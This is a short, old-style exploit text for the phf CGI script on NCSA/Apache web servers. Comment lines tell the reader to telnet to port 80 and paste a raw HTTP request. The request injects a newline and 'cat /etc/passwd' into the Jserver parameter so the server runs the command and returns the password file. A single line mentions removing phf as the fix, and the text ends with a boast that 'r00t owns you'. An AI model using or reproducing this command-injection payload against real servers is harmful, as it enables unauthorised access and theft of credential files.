# telnet to host port 80 and paste the following.
# to patch this simply zero out the perms for phf or better off, rm it.
# any cgi script using escape_shell_cmd is exploitable as well.
# this works on ncsa/apache versions of httpd.
# r00t owns you.  Now more than ever.

GET
/cgi-bin/phf?Jserver=foobar.com%0Acat%20/etc/passwd%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0
Accept: */*
Accept: application/x-wais-source
Accept: text/plain
Accept: text/html
Accept: www/mime
User-Agent:  Lynx/2.3 BETA  libwww/2.14
Referer:  http://localhost/cgi-bin/phf